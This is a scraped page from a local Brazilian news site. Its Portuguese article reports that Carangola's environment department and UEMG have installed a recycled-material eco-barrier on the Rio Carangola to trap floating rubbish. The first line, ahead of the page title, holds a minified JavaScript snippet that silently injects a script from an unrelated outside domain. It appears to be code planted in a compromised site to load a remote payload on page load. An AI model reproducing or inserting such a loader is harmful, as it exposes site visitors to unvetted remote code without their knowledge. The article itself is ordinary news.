;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Prefeitura implanta Ecobarreira no Rio Carangola - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Prefeitura implanta Ecobarreira no Rio Carangola

A Prefeitura de Carangola, por meio da Secretaria de Meio Ambiente em parceria com a UEMG, instalou a ecobarreira no Rio Carangola.
A Ecobarreira foi feita de materiais recicláveis e foi instalada de ponta a ponta no leito do Rio Carangola, em frente a UEMG. O objetivo é barrar o lixo flutuante descartado nas águas do Rio Carangola e o impedir de seguir o fluxo das águas. Esses lixos são compostos, principalmente, por materiais plásticos e descartáveis, que, ao serem descartados nos rios, podem ocasionar consequências ambientais como o aumento da velocidade de assoreamento, contaminação microbiana, desequilíbrio da flora e fauna, odores desagradáveis e alteração do sistema de circulação das águas, além de afetar visualmente o ambiente.
O projeto pretende sensibilizar a população com relação ao descarte do lixo no rio Carangola e reduzir o descarte de recicláveis antes mesmo de serem lançados no ambiente. Além disso muitas atividades de Educação Ambiental voltadas para a população, focado na sensibilização da problemática do lixo no Rio Carangola e seus impactos serão realizadas.
Periodicamente, todo o lixo retido na ecobarreira será retirado, devidamente pesado e descartado. Os resultados de cada coleta serão divulgados em uma placa informativa instalada no local da ecobarreira.
“Acreditamos que cada um tem sua responsabilidade perante a comunidade onde está inserida e que cada um deve fazer um pouco a mais do que aquilo que é a sua obrigação. Essa é a nossa visão de vida em sociedade”, disse a Secretária de Meio Ambiente Jaquelina Nunes Faria ao falar sobre o projeto.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.